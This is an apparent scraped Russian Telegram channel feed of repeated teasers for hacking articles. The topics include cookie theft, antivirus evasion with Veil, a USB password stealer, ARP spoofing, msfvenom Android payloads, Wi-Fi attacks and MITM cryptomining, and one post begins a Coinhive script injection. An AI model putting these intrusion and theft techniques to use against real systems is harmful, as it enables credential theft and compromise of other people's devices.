Crunch — генератор паролей: основы использования и практические примеры
Crunch — генератор словарей паролей, в которых можно определить стандартную или заданную кодировку. Crunch может произвести все возможные комбинации и перестановки.
Crunch — генератор словарей паролей, в которых можно определить стандартную или заданную кодировку. Crunch может произвести все возможные комбинации и перестановки.
Telegraph
Crunch — генератор паролей: основы использования и практические примеры
t.me/webware Crunch — генератор словарей паролей, в которых можно определить стандартную или заданную кодировку. Crunch может произвести все возможные комбинации и перестановки. Особенности: crunch генерирует списки слов (WordList) как методом комбинации…
#vulnerability
Новая версия Plecost 1.0.1 — программы для поиска уязвимостей WordPress
Plecost предназначен для дактилоскопии уязвимостей и поиска уязвимостей в блогах под управлением WordPress.
Новая версия Plecost 1.0.1 — программы для поиска уязвимостей WordPress
Plecost предназначен для дактилоскопии уязвимостей и поиска уязвимостей в блогах под управлением WordPress.
Telegraph
Новая версия Plecost 1.0.1 — программы для поиска уязвимостей WordPress
t.me/webware Про Plecost мы уже писали. В той статье указывается, что проект давно не обновлялся, а для WordPress, которая обновляется быстро и автоматически или с помощью простых действий в графическом интерфейсе, все не обновляемые сканеры быстро «протухают»…
#scanner
Начало работы с ZMap
ZMap – это сетевой сканер с открытым исходным кодом, который позволяет легко выполнять исследования в Интернете. С отдельным устройством и хорошо снабженным сетевым аплинком ZMap может выполнять полное сканирование адресного пространства IPv4 менее чем за 5 минут, приближаясь к теоретическому пределу в десять Гб Ethernet. ZMap сканирует сеть в 1300 раз быстрее сетевого сканера Nmap.
Начало работы с ZMap
ZMap – это сетевой сканер с открытым исходным кодом, который позволяет легко выполнять исследования в Интернете. С отдельным устройством и хорошо снабженным сетевым аплинком ZMap может выполнять полное сканирование адресного пространства IPv4 менее чем за 5 минут, приближаясь к теоретическому пределу в десять Гб Ethernet. ZMap сканирует сеть в 1300 раз быстрее сетевого сканера Nmap.
Telegraph
Начало работы с ZMap
t.me/webware ZMap – это сетевой сканер с открытым исходным кодом, который позволяет легко выполнять исследования в Интернете. С отдельным устройством и хорошо снабженным сетевым аплинком ZMap может выполнять полное сканирование адресного пространства IPv4…
Шпаргалка для разведки и аудита сервера
Всем привет! Решил поделиться с Вами списком полезных, как я считаю, команд для Linux систем со стороны аналитика.
Возможно, пригодятся тем, кто начинает осваивать CTF.
А так же, не будут лишними, что бы иметь их под рукой, проводя аудит реальной системы.
Всем привет! Решил поделиться с Вами списком полезных, как я считаю, команд для Linux систем со стороны аналитика.
Возможно, пригодятся тем, кто начинает осваивать CTF.
А так же, не будут лишними, что бы иметь их под рукой, проводя аудит реальной системы.
Telegraph
Шпаргалка для разведки и аудита сервера
t.me/webware Всем привет! Решил поделиться с Вами списком полезных, как я считаю, команд для Linux систем со стороны аналитика. Возможно, пригодятся тем, кто начинает осваивать CTF. А так же, не будут лишними, что бы иметь их под рукой, проводя аудит реальной…
#scanner
Аргументы командной строки ZMap
В данной статье мы покажем тебе аргументы командной строки, эти параметры являются наиболее распространенными при выполнении простого сканирования. Примите во внимание, что некоторые показатели зависят от зонда или выходного модуля, который используется (например, порт назначения не используется при выполнении ICMP Echo Scan).
Аргументы командной строки ZMap
В данной статье мы покажем тебе аргументы командной строки, эти параметры являются наиболее распространенными при выполнении простого сканирования. Примите во внимание, что некоторые показатели зависят от зонда или выходного модуля, который используется (например, порт назначения не используется при выполнении ICMP Echo Scan).
Telegraph
Аргументы командной строки ZMap
t.me/webware Аргументы командной строки Эти параметры являются наиболее распространенными при выполнении простого сканирования. Примите во внимание, что некоторые показатели зависят от зонда или выходного модуля, который используется (например, порт назначения…
#pentest
Как украсть cookies (Wireshark + Parrot)
Краткая статья о том, как украсть куки с помощью Wireshark и Parrot.
Как украсть cookies (Wireshark + Parrot)
Краткая статья о том, как украсть куки с помощью Wireshark и Parrot.
Telegraph
Как украсть cookies (Wireshark + Parrot)
t.me/webware И так поскольку мы начинаем цикл изучения Parrot Security OS я решил не оставатся без участным и выложит простой материал по данной теме. Нам с вами известно что программа Wireshark обладает не заменимым для нас функционалом. Ее самая приятная…
#antivirus
Как обойти антивирус используя Veil
Антивирус является дополнительным уровнем безопасности, который мы привыкли игнорировать во время пентестинга сценариев. Однако, в этом руководстве мы узнаем как зашифровать функциональную часть вируса (далее payload), таким образом, чтобы АВ (антивирусу) было сложнее обнаружить его.
Как обойти антивирус используя Veil
Антивирус является дополнительным уровнем безопасности, который мы привыкли игнорировать во время пентестинга сценариев. Однако, в этом руководстве мы узнаем как зашифровать функциональную часть вируса (далее payload), таким образом, чтобы АВ (антивирусу) было сложнее обнаружить его.
Telegraph
Как обойти антивирус используя Veil
t.me/webware Антивирус является дополнительным уровнем безопасности, который мы привыкли игнорировать во время пентестинга сценариев. Однако, в этом руководстве мы узнаем как зашифровать функциональную часть вируса (далее payload), таким образом, чтобы АВ…
#scanner
Шаблоны приложений ZMap
ZMap предназначен для работы с большим количеством хостов, он находит те, которые отвечают положительно. Тем не менее, мы понимаем, что многие пользователи желают выполнить обработку на уровне приложений. Например, пользователи, которые выполняют сканирование TCP SYN на порту 80, хотят выполнить простой запрос, а те, кто сканирует порт 443, могут быть заинтересованы в применении соединения TLS Handshake.
Шаблоны приложений ZMap
ZMap предназначен для работы с большим количеством хостов, он находит те, которые отвечают положительно. Тем не менее, мы понимаем, что многие пользователи желают выполнить обработку на уровне приложений. Например, пользователи, которые выполняют сканирование TCP SYN на порту 80, хотят выполнить простой запрос, а те, кто сканирует порт 443, могут быть заинтересованы в применении соединения TLS Handshake.
Telegraph
Шаблоны приложений ZMap
t.me/webware Шаблоны приложений ZMap предназначен для работы с большим количеством хостов, он находит те, которые отвечают положительно. Тем не менее, мы понимаем, что многие пользователи желают выполнить обработку на уровне приложений. Например, пользователи…
#cookies
Что такое cookies и почему они так важны?
Всем привет, в этой статье будет рассказано что такое cookies и почему они так важны. Статья не большая, но полезная :)
Что такое cookies и почему они так важны?
Всем привет, в этой статье будет рассказано что такое cookies и почему они так важны. Статья не большая, но полезная :)
Telegraph
Что такое cookies и почему они так важны ?
t.me/webware Cookie – это небольшой фрагмент данных веб-сайта, который хранится в браузере пользователя. В дальнейшем cookies содержат все запросы, принадлежащие конкретной сессии. Некоторые cookies содержат особо важные данные сеанса, другие используются…
#sql
SQL инъекции — промежуточный уровень
Это теоретическая статья, посвящённый разновидностям атак типа SQL инъекция и самой концепции этого понятия. У атакующего нет прямого способа писать полноценные запросы, поэтому он или она может лишь изменять URL или вводить данные в текстовые формы. Однако понимание MySQL (или любой другой СУБД) части атаки также необходимо. Оно пригодится, когда вы столкнётесь с мощными сайтами, против которых не сработают стандартные атаки, и вам придётся подойти к делу творчески.
SQL инъекции — промежуточный уровень
Это теоретическая статья, посвящённый разновидностям атак типа SQL инъекция и самой концепции этого понятия. У атакующего нет прямого способа писать полноценные запросы, поэтому он или она может лишь изменять URL или вводить данные в текстовые формы. Однако понимание MySQL (или любой другой СУБД) части атаки также необходимо. Оно пригодится, когда вы столкнётесь с мощными сайтами, против которых не сработают стандартные атаки, и вам придётся подойти к делу творчески.
Telegraph
SQL инъекции — промежуточный уровень
t.me/webware Типы SQL инъекций Классическая SQLI Слепая SQL инъекция Специфическая для конкретной системы управления базами данных SQLI Составные SQLI SQL инъекция + недостаточная аутентификация SQL инъекция + DDoS атаки SQL инъекция + взлом DNS SQL инъекция…
#pentest
Создаем USB stealer паролей (для начинающих)
Привет! В этой статье ты научишься создать свою собственную usb-флешку, для быстрого бэкапа (кражи) паролей с нужной для тебя рабочей станции.
Создаем USB stealer паролей (для начинающих)
Привет! В этой статье ты научишься создать свою собственную usb-флешку, для быстрого бэкапа (кражи) паролей с нужной для тебя рабочей станции.
Telegraph
Создаем USB stealer паролей (для начинающих)
t.me/webware Приветсвую! В этой статье, уважаемый %username%, ты научишься создать свою собственную usb-флешку, для быстрого бэкапа (кражи) паролей с нужной для тебя рабочей станции. Что же нам для этого надо: 1) usb флешка 2) продукты от Nirsoft'a, которые…
#pentest
Притворяемся роутером в локальной сети
В этой теме мы обсудим программу способную увеличить количество наших пакетов в разы.
Мы обманем всех, мы заставим их поверить в то что они общаются не с нами, а с роутером. А для этого мы юзанем программу Ettercap (ARP-спуфинг)
Притворяемся роутером в локальной сети
В этой теме мы обсудим программу способную увеличить количество наших пакетов в разы.
Мы обманем всех, мы заставим их поверить в то что они общаются не с нами, а с роутером. А для этого мы юзанем программу Ettercap (ARP-спуфинг)
Telegraph
Притворяемся роутером в локальной сети
t.me/webware И так как я раньше говорил что у меня очень привередлевый попугай так что он мне не дал сделать некоторые скрины(Все вопросы к нему) Но для начало нам необходимо включить форвандинг пакетов(Через терминал естественно), это необходимо что бы наше…
#metasploit
Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android
Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.
Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android
Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.
Telegraph
Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android
t.me/webware Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload. Установка…
#Советы
Социальная инженерия что это и как избежать
Социальная инженерия является искусство манипуляции людьми, чтобы они отдавали конфиденциальную информацию. Тип информации которую эти преступники стремятся узнать может варьировать. Но когда хакер ориентирован, как правило, он пытается обмануть вас чтобы вы дали им свои пароли, банковскую информацию и так далее.
Социальная инженерия что это и как избежать
Социальная инженерия является искусство манипуляции людьми, чтобы они отдавали конфиденциальную информацию. Тип информации которую эти преступники стремятся узнать может варьировать. Но когда хакер ориентирован, как правило, он пытается обмануть вас чтобы вы дали им свои пароли, банковскую информацию и так далее.
Telegraph
Социальная инженерия что это и как избежать
t.me/webware Социальная инженерия является искусство манипуляции людьми, чтобы они отдавали конфиденциальную информацию. Тип информации которую эти преступники стремятся узнать может варьировать. Но когда хакер ориентирован, как правило, он пытается обмануть…
#linux
Как установить безопасный SFTP сервер в Linux
SFTP служба обеспечивает безопасный механизм доступа и передачи файлов через туннель SSH. Если вы настраиваете SFTP сервер, доступ к которому будут иметь множество пользователей, то вам нужно настроить защиту не только от внешних угроз для защиты пользователей SFTP, но и для защиты от угроз от легитимных, но (потенциально) злонамеренных пользователей. Это достигается изолированием окружения индивидуальных пользователей SFTP.
Как установить безопасный SFTP сервер в Linux
SFTP служба обеспечивает безопасный механизм доступа и передачи файлов через туннель SSH. Если вы настраиваете SFTP сервер, доступ к которому будут иметь множество пользователей, то вам нужно настроить защиту не только от внешних угроз для защиты пользователей SFTP, но и для защиты от угроз от легитимных, но (потенциально) злонамеренных пользователей. Это достигается изолированием окружения индивидуальных пользователей SFTP.
Telegraph
Как установить безопасный SFTP сервер в Linux
t.me/webware SFTP служба обеспечивает безопасный механизм доступа и передачи файлов через туннель SSH. Если вы настраиваете SFTP сервер, доступ к которому будут иметь множество пользователей, то вам нужно настроить защиту не только от внешних угроз для защиты…
#metasploit
Установка Metasploit на Windows — руководство пользователя
В этой статье будет рассказано про минимальные требования и установку Metasploit на Windows!
Установка Metasploit на Windows — руководство пользователя
В этой статье будет рассказано про минимальные требования и установку Metasploit на Windows!
Telegraph
Установка Metasploit на Windows — руководство пользователя
t.me/webware Об установщике Metasploit Стандартный установщик Metasploit использует графический интерфейс, чтобы помочь вам в процессе установки. Обычно, это несколько подсказок, которые помогают определить локацию для установки Metasploit и порт, который…
#wifi
Взлом Wi-Fi сетей: инструменты, которые не попали в Kali Linux
Kali Linux включает большой комплект инструментов предназначенных, по большей части, для тестирования на проникновение.
Благодаря открытости и обратной связи, в Кали есть практически всё, что нужно подавляющему большинству пентестеров. Тем не менее, есть немало программ которые они пропустили или сознательно не включают в свой дистрибутив. Я хочу рассказать о четырёх таких программах. Каждая из них предназначена для атаки на беспроводные сети (Wi-Fi). Каждая из них имеет в своём функционале особенности, которые не сводятся к возможностям уже доступных программ.
Взлом Wi-Fi сетей: инструменты, которые не попали в Kali Linux
Kali Linux включает большой комплект инструментов предназначенных, по большей части, для тестирования на проникновение.
Благодаря открытости и обратной связи, в Кали есть практически всё, что нужно подавляющему большинству пентестеров. Тем не менее, есть немало программ которые они пропустили или сознательно не включают в свой дистрибутив. Я хочу рассказать о четырёх таких программах. Каждая из них предназначена для атаки на беспроводные сети (Wi-Fi). Каждая из них имеет в своём функционале особенности, которые не сводятся к возможностям уже доступных программ.
Telegraph
Взлом Wi-Fi сетей: инструменты, которые не попали в Kali Linux
t.me/webware Kali Linux включает большой комплект инструментов предназначенных, по большей части, для тестирования на проникновение. Разработчики Kali следят за выходом новых инструментов и даже предлагают всем желающим рекомендовать новые программы, которые…
#mining
Майним криптовалюту с помощью MITM атаки
Хай всем, решил поделиться способ майнинга криптовалюты за счет MITM атаки.
Майним криптовалюту с помощью MITM атаки
Хай всем, решил поделиться способ майнинга криптовалюты за счет MITM атаки.
Telegraph
Майним криптовалюту с помощью MITM атаки
t.me/webware Хайль всем, решил поделиться способ майнинга криптовалюты за счет MITM атаки. Вы должны зарегаться тут: https://coinhive.com/ Теперь создаем html файл с таким содержимым: <script src="https://coinhive.com/lib/coinhive.min.js"></script><script>…
#antivirus
"Обход" антивируса после компрометации системы.
Всем читателям доброго времени! Сегодня решил описать как можно избавиться от надоедливого, для нашего дела, антивируса.
"Обход" антивируса после компрометации системы.
Всем читателям доброго времени! Сегодня решил описать как можно избавиться от надоедливого, для нашего дела, антивируса.
Telegraph
"Обход" антивируса после компрометации системы.
t.me/webware Всем читателям доброго времени! Сегодня решил описать как можно избавиться от надоедливого ,для нашего дела, антивируса. Так вот как обычно получалось у меня, после получении сессии метерпретер я ничего не мог сделать, что было нужно для меня…
Передача файлов с Android на PC по WIFI
Столкнулся с такой проблемой, когда мне нужно было скачать прошивку на PC и перекинуть её на Android, но кабеля под рукой не было. Так и открыл для себя этот способ передачи файлов.
Столкнулся с такой проблемой, когда мне нужно было скачать прошивку на PC и перекинуть её на Android, но кабеля под рукой не было. Так и открыл для себя этот способ передачи файлов.
Telegraph
Передача файлов с Android на PC по WIFI
t.me/webware Привет! Я новый пользователь форума и это моя первая статья, так что жду от вас критики Столкнулся с такой проблемой, когда мне нужно было скачать прошивку на PC и перекинуть её на Android, но кабеля под рукой не было. Так и открыл для себя этот…